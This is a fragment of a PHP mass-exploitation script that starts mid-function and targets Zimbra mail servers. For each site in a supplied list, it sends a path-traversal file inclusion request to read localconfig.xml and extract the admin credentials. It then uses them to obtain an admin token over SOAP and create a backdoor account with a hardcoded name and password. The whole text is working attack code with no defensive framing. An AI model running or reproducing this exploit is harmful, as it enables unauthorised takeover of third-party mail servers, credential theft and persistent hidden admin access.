$toket$req"; return $body; } if(!$argv[1]){ die("usage $argv[0] list.txt "); } $getlist=@file_get_contents($argv[1]); $ex=explode("\r\n",$getlist); echo "\n\t Total sites : ".count($ex)."\n"; foreach($ex as $izo){ $array = array(); $int = array('https://www.','http://',':','www.','https'); $replace = str_replace($int, "", $izo); $maw = substr($replace,0); $target = $maw; $user_baru = "izocin"; $pwd_baru = "izocin"; $lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"; $link_lfi = "$target/$lfi"; echo "# scanning --->$target\n"; $ch2 = curl_init ("$link_lfi"); curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch2, CURLOPT_ENCODING, "gzip"); curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log'); curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log'); $ambil = curl_exec ($ch2); $get_user = explode('', $ambil); preg_match('/a\["(.*?)<\/value>/', $get_user[1], $user); $get_pwd = explode('', $ambil); preg_match('/a\["(.*?)<\/value>/', $get_pwd[1], $pwd); if($user[1] or $pwd[1] != ""){ echo "# Deneniyor...\n"; $body = " $user[1]$pwd[1]"; $link = "https://$target:7071/service/admin/soap"; $token = ngecek($link,$body); preg_match('/(.*)<\/authToken>/', $token, $toket); if($toket[1]==""){ echo "# token cekilemedi\n\n"; } else{ echo "#token: $toket[1]\n"; $req = @(""); $body2 = nganu_body($toket[1],$req); $liat = ngecek($link,$body2); preg_match('/(.*?)<\/a>/', $liat, $domain); echo "# Creating Account...\n"; $req2 = "$user_baru@$domain[1]$pwd_baru"; $body3 = nganu_body($toket[1],$req2); $liat2 = ngecek($link,$body3); preg_match('/account id="(.*)" name="/', $liat2, $new); $req3 = "$new[1]TRUE"; $body4 = nganu_body($toket[1],$req3); $liat3 = ngecek($link,$body4); echo "# Success\n"; echo "# Login Panel: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password: $pwd_baru\n\n"; } } else{ echo "# not Vulnerable\n\n"; } } ?>